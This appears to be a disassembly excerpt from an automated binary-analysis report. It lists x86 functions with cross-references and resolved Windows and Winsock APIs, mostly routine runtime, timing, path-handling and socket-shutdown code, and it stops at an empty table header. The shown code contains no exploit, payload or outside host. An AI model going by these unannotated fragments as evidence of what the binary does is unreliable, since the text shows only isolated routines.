0040B0C3 mov eax, dword ptr [esp+0Ch]
0040B0C7 and eax, 0000FFFFh
0040B0CC mov dword ptr [0042B0F4h], eax
0040B0D1 jmp 0040B0DCh
0040B0D3 mov eax, dword ptr [esp+0Ch] xrefs 0040B0C1
0040B0D7 mov dword ptr [0042B0F4h], eax
0040B0DC mov eax, 0042B0F8h xrefs 0040B0D1
0040B0E1 lea edx, dword ptr [esp+14h]
0040B0E5 mov ecx, 00000080h
0040B0EA call 0040464Ch
0040B0EF add esp, 00000094h xrefs 0040B09D
0040B0F5 ret function end
APIs
  • QueryPerformanceCounter.KERNEL32, ref: 00402A20
  • GetTickCount.KERNEL32, ref: 00402A34
Address Instruction Meta Information
00402A1C add esp, FFFFFFF8h xrefs 0042925B, 00429DB1
00402A1F push esp
00402A20 call 00401308h QueryPerformanceCounter@KERNEL32.DLL (Hidden Import)
00402A25 test eax, eax
00402A27 je 00402A34h
00402A29 mov eax, dword ptr [esp]
00402A2C mov dword ptr [0042B008h], eax
00402A31 pop ecx
00402A32 pop edx
00402A33 ret function end
00402A34 call 00401310h GetTickCount@KERNEL32.DLL (Hidden Import) xrefs 00402A27
00402A39 mov dword ptr [0042B008h], eax
00402A3E pop ecx
00402A3F pop edx
00402A40 ret function end
Address Instruction Meta Information
00402B00 push ebx xrefs 00402B1B, 0040307A
00402B01 mov ebx, eax
00402B03 push ebx
00402B04 call 004011A0h
00402B09 dec eax
00402B0A sete al
00402B0D pop ebx
00402B0E ret function end
Address Instruction Meta Information
00404064 push ebp xrefs 004040FE
00404065 mov ebp, esp
00404067 push ebx
00404068 push esi
00404069 push edi
0040406A mov eax, dword ptr [0042C638h] 00429CC0
0040406F test eax, eax
00404071 je 004040BEh
00404073 mov esi, dword ptr [eax]
00404075 xor ebx, ebx
00404077 mov edi, dword ptr [eax+04h]
0040407A xor edx, edx
0040407C push ebp
0040407D push 004040AAh
00404082 push dword ptr fs:[edx]
00404085 mov dword ptr fs:[edx], esp
00404088 cmp esi, ebx
0040408A jle 004040A0h
0040408C mov eax, dword ptr [edi+ebx*8] xrefs 0040409E
0040408F inc ebx
00404090 mov dword ptr [0042C63Ch], ebx
00404096 test eax, eax
00404098 je 0040409Ch
0040409A call eax
0040409C cmp esi, ebx xrefs 00404098
0040409E jnle 0040408Ch
004040A0 xor eax, eax xrefs 0040408A
004040A2 pop edx
004040A4 pop ecx Count = 2
004040A5 mov dword ptr fs:[eax], edx
004040A8 jmp 004040BEh
004040BE pop edi xrefs 00404071, 004040A8
004040BF pop esi
004040C0 pop ebx
004040C1 pop ebp
004040C2 ret function end
APIs
  • LoadStringA.USER32, ref: 00405DB1
Address Instruction Meta Information
00405D80 push ebx xrefs 0040A9F3, 0040A1AE, 0040AB91, 0040ABBC, 0040AD35, 0040AE4D, 0040ADF1, 0040AD26, 0040AF20, 0040A99E, 0040411A, 0040D387, 0040D41B, 0040D477, 0040D50B, 0040D567, 0040D697, 0040D6BD, 0040D709, 0040D72F, 0040D7A4, 0040D671, 0040D641, 0040D6E3, 0040D752, 0040D84F, 0041067A, 00410E85
00405D81 push esi
00405D82 add esp, FFFFFC00h
00405D88 mov esi, edx
00405D8A mov ebx, eax
00405D8C test ebx, ebx
00405D8E je 00405DCDh
00405D90 cmp dword ptr [ebx+04h], 00010000h
00405D97 jnl 00405DC3h
00405D99 push 00000400h
00405D9E lea eax, dword ptr [esp+04h]
00405DA2 push eax
00405DA3 mov eax, dword ptr [ebx+04h]
00405DA6 push eax
00405DA7 mov eax, dword ptr [ebx]
00405DA9 mov eax, dword ptr [eax]
00405DAB call 00405328h
00405DB0 push eax
00405DB1 call 00401288h LoadStringA@USER32.DLL (Hidden Import)
00405DB6 mov ecx, eax
00405DB8 mov edx, esp
00405DBA mov eax, esi
00405DBC call 004044CCh
00405DC1 jmp 00405DCDh
00405DC3 mov eax, esi xrefs 00405D97
00405DC5 mov edx, dword ptr [ebx+04h]
00405DC8 call 004045D4h
00405DCD add esp, 00000400h xrefs 00405D8E, 00405DC1
00405DD3 pop esi
00405DD4 pop ebx
00405DD5 ret function end
Address Instruction Meta Information
0041BC40 push ebp
0041BC41 mov ebp, esp
0041BC43 add esp, FFFFFFF8h
0041BC46 push ebx
0041BC47 push esi
0041BC48 push edi
0041BC49 mov dword ptr [ebp-08h], ecx
0041BC4C mov dword ptr [ebp-04h], edx
0041BC4F mov ebx, eax
0041BC51 mov eax, dword ptr [ebp-04h]
0041BC54 call 00404868h
0041BC59 mov eax, dword ptr [ebp-08h]
0041BC5C call 00404868h
0041BC61 xor eax, eax
0041BC63 push ebp
0041BC64 push 0041BCF9h
0041BC69 push dword ptr fs:[eax]
0041BC6C mov dword ptr fs:[eax], esp
0041BC6F xor eax, eax
0041BC71 push ebp
0041BC72 push 0041BCD4h
0041BC77 push dword ptr fs:[eax]
0041BC7A mov dword ptr fs:[eax], esp
0041BC7D cmp dword ptr [ebx+000001C0h], 00000000h
0041BC84 je 0041BC95h
0041BC86 mov ecx, dword ptr [ebp-08h]
0041BC89 mov edx, dword ptr [ebp-04h]
0041BC8C mov eax, ebx
0041BC8E call 0041BD08h
0041BC93 jmp 0041BCBAh
0041BC95 cmp dword ptr [ebx+00000204h], 00000000h xrefs 0041BC84
0041BC9C je 0041BCADh
0041BC9E mov ecx, dword ptr [ebp-08h]
0041BCA1 mov edx, dword ptr [ebp-04h]
0041BCA4 mov eax, ebx
0041BCA6 call 0041BE30h
0041BCAB jmp 0041BCBAh
0041BCAD mov ecx, dword ptr [ebp-08h] xrefs 0041BC9C
0041BCB0 mov edx, dword ptr [ebp-04h]
0041BCB3 mov eax, ebx
0041BCB5 call 004184B8h
0041BCBA cmp dword ptr [ebx+000001B8h], 00000000h xrefs 0041BCAB, 0041BC93
0041BCC1 jne 0041BCCAh
0041BCC3 mov eax, ebx
0041BCC5 call 0041BA7Ch
0041BCCA xor eax, eax xrefs 0041BCC1
0041BCCC pop edx
0041BCCE pop ecx Count = 2
0041BCCF mov dword ptr fs:[eax], edx
0041BCD2 jmp 0041BCDEh
0041BCDE xor eax, eax xrefs 0041BCD2
0041BCE0 pop edx
0041BCE2 pop ecx Count = 2
0041BCE3 mov dword ptr fs:[eax], edx
0041BCE6 push 0041BD00h
0041BCEB lea eax, dword ptr [ebp-08h] xrefs 0041BCFE
0041BCEE mov edx, 00000002h
0041BCF3 call 00404400h
0041BCF8 ret function end
APIs
  • GetLocaleInfoA.KERNEL32, ref: 0040A12A
  • EnumCalendarInfoA.KERNEL32, ref: 0040A3E7
Address Instruction Meta Information
0040A394 push ebp xrefs 0040B7F1
0040A395 mov ebp, esp
0040A397 push 00000000h
0040A399 push esi
0040A39A xor eax, eax
0040A39C push ebp
0040A39D push 0040A42Bh
0040A3A2 push dword ptr fs:[eax]
0040A3A5 mov dword ptr fs:[eax], esp
0040A3A8 lea eax, dword ptr [ebp-04h]
0040A3AB push eax
0040A3AC call 004061ECh
0040A3B1 mov ecx, 0040A440h
0040A3B6 mov edx, 0000100Bh
0040A3BB call 0040A10Ch
0040A3C0 mov eax, dword ptr [ebp-04h]
0040A3C3 mov edx, 00000001h
0040A3C8 call 00407608h
0040A3CD mov esi, eax
0040A3CF mov eax, esi
0040A3D1 add eax, FFFFFFFDh
0040A3D4 sub eax, 03h
0040A3D7 jnc 0040A415h
0040A3D9 push 00000004h
0040A3DB push esi
0040A3DC call 004061ECh
0040A3E1 push eax
0040A3E2 push 0040A2E0h
0040A3E7 call 00406124h EnumCalendarInfoA@KERNEL32.DLL (Hidden Import)
0040A3EC mov edx, 00000007h
0040A3F1 mov eax, 0042C764h
0040A3F6 mov dword ptr [eax], FFFFFFFFh xrefs 0040A400
0040A3FC add eax, 04h
0040A3FF dec edx
0040A400 jne 0040A3F6h
0040A402 push 00000003h
0040A404 push esi
0040A405 call 004061ECh
0040A40A push eax
0040A40B push 0040A31Ch
0040A410 call 00406124h
0040A415 xor eax, eax xrefs 0040A3D7
0040A417 pop edx
0040A419 pop ecx Count = 2
0040A41A mov dword ptr fs:[eax], edx
0040A41D push 0040A432h
0040A422 lea eax, dword ptr [ebp-04h] xrefs 0040A430
0040A425 call 004043DCh
0040A42A ret function end
Address Instruction Meta Information
004184B8 push ebp xrefs 0041BB5A, 0041BCB5, 0041BE99, 0041BD48
004184B9 mov ebp, esp
004184BB add esp, FFFFFFD8h
004184BE push ebx
004184BF xor ebx, ebx
004184C1 mov dword ptr [ebp-28h], ebx
004184C4 mov dword ptr [ebp-08h], ecx
004184C7 mov dword ptr [ebp-04h], edx
004184CA mov ebx, eax
004184CC mov eax, dword ptr [ebp-04h]
004184CF call 00404868h
004184D4 mov eax, dword ptr [ebp-08h]
004184D7 call 00404868h
004184DC xor eax, eax
004184DE push ebp
004184DF push 004185A2h
004184E4 push dword ptr fs:[eax]
004184E7 mov dword ptr fs:[eax], esp
004184EA mov eax, dword ptr [ebp-08h]
004184ED push eax
004184EE lea edx, dword ptr [ebp-24h]
004184F1 mov ecx, dword ptr [ebp-04h]
004184F4 mov eax, ebx
004184F6 call 0041803Ch
004184FB cmp dword ptr [ebx+000001B8h], 00000000h
00418502 jne 00418554h
00418504 cmp dword ptr [ebx+000001B4h], FFFFFFFFh
0041850B jne 00418517h
0041850D lea edx, dword ptr [ebp-24h]
00418510 mov eax, ebx
00418512 call 004181D8h
00418517 lea edx, dword ptr [ebp-24h] xrefs 0041850B
0041851A mov eax, dword ptr [ebx+000001B4h]
00418520 call 004139F4h
00418525 mov edx, eax
00418527 mov eax, ebx
00418529 mov ecx, dword ptr [eax]
0041852B call dword ptr [ecx+78h]
0041852E cmp dword ptr [ebx+000001B8h], 00000000h
00418535 jne 0041853Eh
00418537 mov eax, ebx
00418539 call 004185DCh
0041853E lea eax, dword ptr [ebx+6Ch] xrefs 00418535
00418541 call 004043DCh
00418546 mov byte ptr [ebx+00000089h], 00000000h
0041854D mov byte ptr [ebx+0000008Ah], 00000000h
00418554 mov eax, ebx xrefs 00418502
00418556 call 0041952Ch
0041855B push dword ptr [ebp-04h]
0041855E push 004185B8h
00418563 push dword ptr [ebp-08h]
00418566 lea eax, dword ptr [ebp-28h]
00418569 mov edx, 00000003h
0041856E call 00404738h
00418573 mov ecx, dword ptr [ebp-28h]
00418576 mov dl, 05h
00418578 mov eax, ebx
0041857A call 00419E70h
0041857F xor eax, eax
00418581 pop edx
00418583 pop ecx Count = 2
00418584 mov dword ptr fs:[eax], edx
00418587 push 004185A9h
0041858C lea eax, dword ptr [ebp-28h] xrefs 004185A7
0041858F call 004043DCh
00418594 lea eax, dword ptr [ebp-08h]
00418597 mov edx, 00000002h
0041859C call 00404400h
004185A1 ret function end
APIs
  • getpeername.WS2_32, ref: 00413A55
Address Instruction Meta Information
00413A38 push ebx xrefs 004185D5
00413A39 push esi
00413A3A push ecx
00413A3B mov ebx, edx
00413A3D mov esi, eax
00413A3F mov dword ptr [esp], 0000001Ch
00413A46 mov eax, ebx
00413A48 xor ecx, ecx
00413A4A mov edx, dword ptr [esp]
00413A4D call 00403030h
00413A52 push esp
00413A53 push ebx
00413A54 push esi
00413A55 call dword ptr [0042B430h] getpeername@WS2_32.DLL (Hidden Import)
00413A5B pop edx
00413A5C pop esi
00413A5D pop ebx
00413A5E ret function end
Address Instruction Meta Information
00418D2C push ebx
00418D2D push esi
00418D2E push edi
00418D2F push ebp
00418D30 mov esi, ecx
00418D32 mov ebp, edx
00418D34 mov ebx, eax
00418D36 mov eax, esi
00418D38 call 004043DCh
00418D3D mov eax, ebx
00418D3F call 0041949Ch
00418D44 cmp dword ptr [ebx+6Ch], 00000000h
00418D48 je 00418D61h
00418D4A mov eax, esi
00418D4C mov edx, dword ptr [ebx+6Ch]
00418D4F call 00404430h
00418D54 lea eax, dword ptr [ebx+6Ch]
00418D57 call 004043DCh
00418D5C jmp 00418DF4h
00418D61 xor eax, eax xrefs 00418D48
00418D63 call 00413778h
00418D68 mov eax, ebx
00418D6A mov edx, dword ptr [eax]
00418D6C call dword ptr [edx+74h]
00418D6F mov edi, eax
00418D71 test edi, edi
00418D73 jle 00418D9Ah
00418D75 mov eax, esi
00418D77 mov edx, edi
00418D79 call 004049A8h
00418D7E mov edx, dword ptr [esi]
00418D80 mov ecx, edi
00418D82 mov eax, ebx
00418D84 mov edi, dword ptr [eax]
00418D86 call dword ptr [edi+3Ch]
00418D89 mov edi, eax
00418D8B test edi, edi
00418D8D jl 00418DF4h
00418D8F mov eax, esi
00418D91 mov edx, edi
00418D93 call 004049A8h
00418D98 jmp 00418DF4h
00418D9A mov edx, ebp xrefs 00418D73
00418D9C mov eax, ebx
00418D9E mov ecx, dword ptr [eax]
00418DA0 call dword ptr [ecx+0000008Ch]
00418DA6 test al, al
00418DA8 je 00418DEAh
00418DAA mov eax, ebx
00418DAC mov edx, dword ptr [eax]
00418DAE call dword ptr [edx+74h]
00418DB1 mov edi, eax
00418DB3 test edi, edi
00418DB5 jne 00418DC1h
00418DB7 mov dword ptr [ebx+000001B8h], 00002746h
00418DC1 test edi, edi xrefs 00418DB5
00418DC3 jle 00418DF4h
00418DC5 mov eax, esi
00418DC7 mov edx, edi
00418DC9 call 004049A8h
00418DCE mov edx, dword ptr [esi]
00418DD0 mov ecx, edi
00418DD2 mov eax, ebx
00418DD4 mov edi, dword ptr [eax]
00418DD6 call dword ptr [edi+3Ch]
00418DD9 mov edi, eax
00418DDB test edi, edi
00418DDD jl 00418DF4h
00418DDF mov eax, esi
00418DE1 mov edx, edi
00418DE3 call 004049A8h
00418DE8 jmp 00418DF4h
00418DEA mov dword ptr [ebx+000001B8h], 0000274Ch xrefs 00418DA8
00418DF4 cmp byte ptr [ebx+00000088h], 00000000h xrefs 00418DC3, 00418DDD, 00418DE8, 00418D8D, 00418D98, 00418D5C
00418DFB je 00418E52h
00418DFD cmp dword ptr [esi], 00000000h
00418E00 je 00418E52h
00418E02 cmp byte ptr [ebx+00000089h], 00000000h
00418E09 je 00418E23h
00418E0B mov eax, dword ptr [esi]
00418E0D cmp byte ptr [eax], 0000000Ah
00418E10 jne 00418E23h
00418E12 mov eax, esi
00418E14 mov ecx, 00000001h
00418E19 mov edx, 00000001h
00418E1E call 00404918h
00418E23 cmp byte ptr [ebx+0000008Ah], 00000000h xrefs 00418E09, 00418E10
00418E2A je 00418E44h
00418E2C mov eax, dword ptr [esi]
00418E2E cmp byte ptr [eax], 0000000Dh
00418E31 jne 00418E44h
00418E33 mov eax, esi
00418E35 mov ecx, 00000001h
00418E3A mov edx, 00000001h
00418E3F call 00404918h
00418E44 mov byte ptr [ebx+00000089h], 00000000h xrefs 00418E2A, 00418E31
00418E4B mov byte ptr [ebx+0000008Ah], 00000000h
00418E52 mov eax, ebx xrefs 00418DFB, 00418E00
00418E54 call 0041952Ch
00418E59 pop ebp
00418E5A pop edi
00418E5B pop esi
00418E5C pop ebx
00418E5D ret function end
APIs
  • GetModuleHandleA.KERNEL32, ref: 00406044
Address Instruction Meta Information
00406038 push ebx xrefs 00429D9E
00406039 mov ebx, eax
0040603B xor eax, eax
0040603D mov dword ptr [0042B0C4h], eax
00406042 push 00000000h
00406044 call 00405F74h GetModuleHandleA@KERNEL32.DLL (Hidden Import)
00406049 mov dword ptr [0042C660h], eax
0040604E mov eax, dword ptr [0042C660h] 00400000
00406053 mov dword ptr [0042B0CCh], eax
00406058 xor eax, eax
0040605A mov dword ptr [0042B0D0h], eax
0040605F xor eax, eax
00406061 mov dword ptr [0042B0D4h], eax
00406066 call 0040602Ch
0040606B mov edx, 0042B0C8h
00406070 mov eax, ebx
00406072 call 004040C4h
00406077 pop ebx
00406078 ret function end
APIs
  • shutdown.WS2_32, ref: 0041BA6A
Address Instruction Meta Information
0041BA38 push ebx
0041BA39 mov ebx, eax
0041BA3B mov eax, dword ptr [ebx+00000200h]
0041BA41 cmp byte ptr [eax+08h], 00000000h
0041BA45 je 0041BA4Ch
0041BA47 mov edx, dword ptr [eax]
0041BA49 call dword ptr [edx+1Ch]
0041BA4C mov eax, dword ptr [ebx+000001B4h] xrefs 0041BA45
0041BA52 cmp eax, FFFFFFFFh
0041BA55 je 0041BA73h
0041BA57 cmp dword ptr [ebx+000001B8h], 00000000h
0041BA5E jne 0041BA73h
0041BA60 push 00000001h
0041BA62 push eax
0041BA63 mov eax, dword ptr [0042B784h] 0042B3F0
0041BA68 mov eax, dword ptr [eax]
0041BA6A call eax shutdown@WS2_32.DLL (Hidden Import)
0041BA6C mov eax, ebx
0041BA6E call 004196C4h
0041BA73 mov eax, ebx xrefs 0041BA55, 0041BA5E
0041BA75 call 004182F4h
0041BA7A pop ebx
0041BA7B ret function end
APIs
  • CharNextA.USER32, ref: 00405353
  • GetModuleHandleA.KERNEL32, ref: 00405381
  • GetProcAddress.KERNEL32, ref: 00405392
  • lstrcpyn.KERNEL32, ref: 00405426
  • FindFirstFileA.KERNEL32, ref: 0040546E
  • FindClose.KERNEL32, ref: 0040547B
  • lstrlen.KERNEL32, ref: 00405487
Strings
  • kernel32.dll, va: 004054F8
  • GetLongPathNameA, va: 00405508
Address Instruction Meta Information
00405364 push ebp xrefs 004055BF
00405365 mov ebp, esp
00405367 add esp, FFFFFDB0h
0040536D push ebx
0040536E push esi
0040536F push edi
00405370 mov dword ptr [ebp-08h], edx
00405373 mov dword ptr [ebp-04h], eax
00405376 mov eax, dword ptr [ebp-04h]
00405379 mov dword ptr [ebp-0Ch], eax
0040537C push 004054F8h ASCII "kernel32.dll"
00405381 call 00401260h GetModuleHandleA@KERNEL32.DLL (Hidden Import)
00405386 mov esi, eax
00405388 test esi, esi
0040538A je 004053CCh
0040538C push 00405508h ASCII "GetLongPathNameA"
00405391 push esi
00405392 call 00401268h GetProcAddress@KERNEL32.DLL (Import)
00405397 mov ebx, eax
00405399 test ebx, ebx
0040539B je 004053CCh
0040539D push 00000105h
004053A2 lea eax, dword ptr [ebp-0000024Fh]
004053A8 push eax
004053A9 mov eax, dword ptr [ebp-04h]
004053AC push eax
004053AD call ebx
004053AF test eax, eax
004053B1 je 004053CCh
004053B3 mov eax, dword ptr [ebp-08h]
004053B6 push eax
004053B7 lea eax, dword ptr [ebp-0000024Fh]
004053BD push eax
004053BE mov eax, dword ptr [ebp-04h]
004053C1 push eax
004053C2 call 00401290h
004053C7 jmp 004054EEh
004053CC mov eax, dword ptr [ebp-04h] xrefs 0040538A, 0040539B, 004053B1
004053CF cmp byte ptr [eax], 0000005Ch
004053D2 jne 0040540Ch
004053D4 mov eax, dword ptr [ebp-04h]
004053D7 cmp byte ptr [eax+01h], 0000005Ch
004053DB jne 004054EEh
004053E1 mov eax, dword ptr [ebp-04h]
004053E4 add eax, 02h
004053E7 call 00405350h
004053EC mov esi, eax
004053EE cmp byte ptr [esi], 00000000h
004053F1 je 004054EEh
004053F7 lea eax, dword ptr [esi+01h]
004053FA call 00405350h
004053FF mov esi, eax
00405401 cmp byte ptr [esi], 00000000h
00405404 je 004054EEh
0040540A jmp 00405412h
0040540C mov esi, dword ptr [ebp-04h] xrefs 004053D2
0040540F add esi, 02h
00405412 mov ebx, esi xrefs 0040540A
00405414 sub ebx, dword ptr [ebp-04h]
00405417 lea eax, dword ptr [ebx+01h]
0040541A push eax
0040541B mov eax, dword ptr [ebp-04h]
0040541E push eax
0040541F lea eax, dword ptr [ebp-0000024Fh]
00405425 push eax
00405426 call 00401290h lstrcpyn@KERNEL32.DLL (Hidden Import)
0040542B jmp 004054D1h
00405430 lea eax, dword ptr [esi+01h] xrefs 004054D4
00405433 call 00405350h
00405438 mov edi, eax
0040543A mov eax, edi
0040543C sub eax, esi
0040543E mov edx, eax
00405440 add edx, ebx
00405442 inc edx
00405443 cmp edx, 00000105h
00405449 jg 004054EEh
0040544F inc eax
00405450 push eax
00405451 push esi
00405452 lea eax, dword ptr [ebp-0000024Fh]
00405458 add eax, ebx
0040545A push eax
0040545B call 00401290h
00405460 lea eax, dword ptr [ebp-0000014Ah]
00405466 push eax
00405467 lea eax, dword ptr [ebp-0000024Fh]
0040546D push eax
0040546E call 00401230h FindFirstFileA@KERNEL32.DLL (Hidden Import)
00405473 mov esi, eax
00405475 cmp esi, FFFFFFFFh
00405478 je 004054EEh
0040547A push esi
0040547B call 00401228h FindClose@KERNEL32.DLL (Hidden Import)
00405480 lea eax, dword ptr [ebp-0000011Eh]
00405486 push eax
00405487 call 00401298h lstrlen@KERNEL32.DLL (Hidden Import)
0040548C lea edx, dword ptr [ebx+01h]
0040548F add eax, edx
00405491 inc eax
00405492 cmp eax, 00000105h
00405497 jnle 004054EEh
00405499 mov byte ptr [ebp+ebx-0000024Fh], 0000005Ch
004054A1 mov eax, 00000105h
004054A6 sub eax, ebx
004054A8 dec eax
004054A9 push eax
004054AA lea eax, dword ptr [ebp-0000011Eh]
004054B0 push eax
004054B1 lea eax, dword ptr [ebp-0000024Fh]
004054B7 add eax, ebx
004054B9 inc eax
004054BA push eax
004054BB call 00401290h
004054C0 lea eax, dword ptr [ebp-0000011Eh]
004054C6 push eax
004054C7 call 00401298h
004054CC inc eax
004054CD add ebx, eax
004054CF mov esi, edi
004054D1 cmp byte ptr [esi], 00000000h xrefs 0040542B
004054D4 jne 00405430h
004054DA mov eax, dword ptr [ebp-08h]
004054DD push eax
004054DE lea eax, dword ptr [ebp-0000024Fh]
004054E4 push eax
004054E5 mov eax, dword ptr [ebp-04h]
004054E8 push eax
004054E9 call 00401290h
004054EE mov eax, dword ptr [ebp-0Ch] xrefs 00405449, 00405478, 00405497, 004053DB, 004053F1, 00405404, 004053C7
004054F1 pop edi
004054F2 pop esi
004054F3 pop ebx
004054F4 mov esp, ebp
004054F6 pop ebp
004054F7 ret function end
APIs
  • InterlockedDecrement.KERNEL32, ref: 004059B0
Address Instruction Meta Information
004059A4 push ebp
004059A5 mov ebp, esp
004059A7 push ebx
004059A8 push esi
004059A9 mov ebx, dword ptr [ebp+08h]
004059AC lea eax, dword ptr [ebx+04h]
004059AF push eax
004059B0 call 004012F0h InterlockedDecrement@KERNEL32.DLL (Hidden Import)
004059B5 mov esi, eax
004059B7 test esi, esi
004059B9 jne 004059C4h
004059BB mov dl, 01h
004059BD mov eax, ebx
004059BF mov ecx, dword ptr [eax]
004059C1 call dword ptr [ecx-04h]
004059C4 mov eax, esi xrefs 004059B9
004059C6 pop esi
004059C7 pop ebx
004059C8 pop ebp
004059C9 retn 0004h function end
APIs
  • FormatMessageA.KERNEL32, ref: 0040A0DF
  • RtlGetLastWin32Error.NTDLL, ref: 0040BB5A
Address Instruction Meta Information
0040BB40 push ebp xrefs 0040BBE3, 00412ECC
0040BB41 mov ebp, esp
0040BB43 add esp, FFFFFFECh
0040BB46 push ebx
0040BB47 xor eax, eax
0040BB49 mov dword ptr [ebp-14h], eax
0040BB4C xor eax, eax
0040BB4E push ebp
0040BB4F push 0040BBD0h
0040BB54 push dword ptr fs:[eax]
0040BB57 mov dword ptr fs:[eax], esp
0040BB5A call 004061ACh RtlGetLastWin32Error@NTDLL.DLL (Hidden Import)
0040BB5F mov ebx, eax
0040BB61 test ebx, ebx
0040BB63 je 0040BB9Ch
0040BB65 mov dword ptr [ebp-10h], ebx
0040BB68 mov byte ptr [ebp-0Ch], 00000000h
0040BB6C lea edx, dword ptr [ebp-14h]
0040BB6F mov eax, ebx
0040BB71 call 0040A0C0h
0040BB76 mov eax, dword ptr [ebp-14h]
0040BB79 mov dword ptr [ebp-08h], eax
0040BB7C mov byte ptr [ebp-04h], 0000000Bh
0040BB80 lea eax, dword ptr [ebp-10h]
0040BB83 push eax
0040BB84 push 00000001h
0040BB86 mov ecx, dword ptr [0042B8D0h] 004064EC
0040BB8C mov dl, 01h
0040BB8E mov eax, dword ptr [00406FC8h] 00407014
0040BB93 call 0040A9C0h
0040BB98 mov edx, eax
0040BB9A jmp 0040BBB0h
0040BB9C mov ecx, dword ptr [0042B94Ch] 004064F4 xrefs 0040BB63
0040BBA2 mov dl, 01h
0040BBA4 mov eax, dword ptr [00406FC8h] 00407014
0040BBA9 call 0040A984h
0040BBAE mov edx, eax
0040BBB0 mov dword ptr [edx+0Ch], ebx xrefs 0040BB9A
0040BBB3 mov eax, edx
0040BBB5 call 00403DB8h
0040BBBA xor eax, eax
0040BBBC pop edx
0040BBBE pop ecx Count = 2
0040BBBF mov dword ptr fs:[eax], edx
0040BBC2 push 0040BBD7h
0040BBC7 lea eax, dword ptr [ebp-14h] xrefs 0040BBD5
0040BBCA call 004043DCh
0040BBCF ret function end
APIs
  • FormatMessageA.KERNEL32, ref: 0040A0DF
Address Instruction Meta Information
0040A0C0 push ebx xrefs 0040BB71, 0040D787, 00412366, 00412301, 004131EC, 004132ED
0040A0C1 add esp, FFFFFF00h
0040A0C7 mov ebx, edx
0040A0C9 push 00000000h
0040A0CB push 00000100h
0040A0D0 lea edx, dword ptr [esp+08h]
0040A0D4 push edx
0040A0D5 push 00000000h
0040A0D7 push eax
0040A0D8 push 00000000h
0040A0DA push 00003200h
0040A0DF call 0040614Ch FormatMessageA@KERNEL32.DLL (Hidden Import)
0040A0E4 jmp 0040A0E7h
0040A0E6 dec eax xrefs 0040A0F2, 0040A0F7
0040A0E7 test eax, eax xrefs 0040A0E4
0040A0E9 jle 0040A0F9h
0040A0EB mov dl, byte ptr [esp+eax-01h]
0040A0EF sub dl, 00000021h
0040A0F2 jc 0040A0E6h
0040A0F4 sub dl, 0000000Dh
0040A0F7 je 0040A0E6h
0040A0F9 mov edx, esp xrefs 0040A0E9
0040A0FB mov ecx, ebx
0040A0FD xchg eax, ecx
0040A0FE call 004044CCh
0040A103 add esp, 00000100h
0040A109 pop ebx
0040A10A ret function end
APIs
  • ResetEvent.KERNEL32, ref: 00412EF6
  • WaitForSingleObject.KERNEL32, ref: 00412F06
  • InterlockedExchange.KERNEL32, ref: 00412FB7
Address Instruction Meta Information
00412F3C push ebp xrefs 00413586
00412F3D mov ebp, esp
00412F3F add esp, FFFFFFECh
00412F42 push ebx
00412F43 push esi
00412F44 push edi
00412F45 mov ebx, eax
00412F47 call 00406184h
00412F4C mov edx, dword ptr [0042B984h] 0042C030
00412F52 cmp eax, dword ptr [edx]
00412F54 je 00412F7Fh
00412F56 call 00406184h
00412F5B mov dword ptr [ebp-14h], eax
00412F5E mov byte ptr [ebp-10h], 00000000h
00412F62 lea eax, dword ptr [ebp-14h]
00412F65 push eax
00412F66 push 00000000h
00412F68 mov ecx, dword ptr [0042B8B8h] 0040F5AC
00412F6E mov dl, 01h
00412F70 mov eax, dword ptr [004100F0h] 0041013C
00412F75 call 0040A9C0h
00412F7A call 00403DB8h
00412F7F test ebx, ebx xrefs 00412F54
00412F81 jle 00412F8Ch
00412F83 mov eax, ebx
00412F85 call 00412EFCh
00412F8A jmp 00412F91h
00412F8C call 00412EF0h xrefs 00412F81
00412F91 xor eax, eax xrefs 00412F8A
00412F93 mov dword ptr [ebp-0Ch], eax
00412F96 push 0042C860h
00412F9B call 0040611Ch
00412FA0 xor eax, eax
00412FA2 push ebp
00412FA3 push 004130CAh
00412FA8 push dword ptr fs:[eax]
00412FAB mov dword ptr fs:[eax], esp
00412FAE mov eax, dword ptr [ebp-0Ch]
00412FB1 push eax
00412FB2 push 0042B3C4h
00412FB7 call 00406164h InterlockedExchange@KERNEL32.DLL (Hidden Import)
00412FBC mov dword ptr [ebp-0Ch], eax
00412FBF xor eax, eax
00412FC1 push ebp
00412FC2 push 004130ABh
00412FC7 push dword ptr fs:[eax]
00412FCA mov dword ptr fs:[eax], esp
00412FCD cmp dword ptr [ebp-0Ch], 00000000h
00412FD1 je 00412FDCh
00412FD3 mov eax, dword ptr [ebp-0Ch]
00412FD6 cmp dword ptr [eax+08h], 00000000h
00412FDA jnle 00412FE0h
00412FDC xor eax, eax xrefs 00412FD1
00412FDE jmp 00412FE2h
00412FE0 mov al, 01h xrefs 00412FDA
00412FE2 mov byte ptr [ebp-01h], al xrefs 00412FDE
00412FE5 cmp byte ptr [ebp-01h], 00000000h
00412FE9 je 00413095h
00412FEF jmp 00413088h
00412FF4 xor edx, edx xrefs 0041308F
00412FF6 mov eax, dword ptr [ebp-0Ch]
00412FF9 call 004106B0h
00412FFE mov dword ptr [ebp-08h], eax
00413001 xor edx, edx
00413003 mov eax, dword ptr [ebp-0Ch]
00413006 call 004105C0h
0041300B push 0042C860h
00413010 call 0040623Ch
00413015 xor eax, eax
00413017 push ebp
00413018 push 00413075h
0041301D push dword ptr fs:[eax]
00413020 mov dword ptr fs:[eax], esp
00413023 xor eax, eax
00413025 push ebp
00413026 push 00413046h
0041302B push dword ptr fs:[eax]
0041302E mov dword ptr fs:[eax], esp
00413031 mov eax, dword ptr [ebp-08h]
00413034 mov ebx, dword ptr [eax]
00413036 mov eax, dword ptr [ebx+0Ch]
00413039 call dword ptr [ebx+08h]
0041303C xor eax, eax
0041303E pop edx
00413040 pop ecx Count = 2
00413041 mov dword ptr fs:[eax], edx
00413044 jmp 0041305Dh
0041305D xor eax, eax xrefs 00413044
0041305F pop edx
00413061 pop ecx Count = 2
00413062 mov dword ptr fs:[eax], edx
00413065 push 0041307Ch
0041306A push 0042C860h xrefs 0041307A
0041306F call 0040611Ch
00413074 ret function end
00413088 mov eax, dword ptr [ebp-0Ch] xrefs 00412FEF
0041308B cmp dword ptr [eax+08h], 00000000h
0041308F jg 00412FF4h
00413095 xor eax, eax xrefs 00412FE9
00413097 pop edx
00413099 pop ecx Count = 2
0041309A mov dword ptr fs:[eax], edx
0041309D push 004130B2h
004130A2 mov eax, dword ptr [ebp-0Ch] xrefs 004130B0
004130A5 call 00403708h
004130AA ret function end
APIs
  • QueryPerformanceFrequency.KERNEL32, ref: 00414FF0
  • QueryPerformanceCounter.KERNEL32, ref: 00414FFA
  • GetTickCount.KERNEL32, ref: 00415018
Address Instruction Meta Information
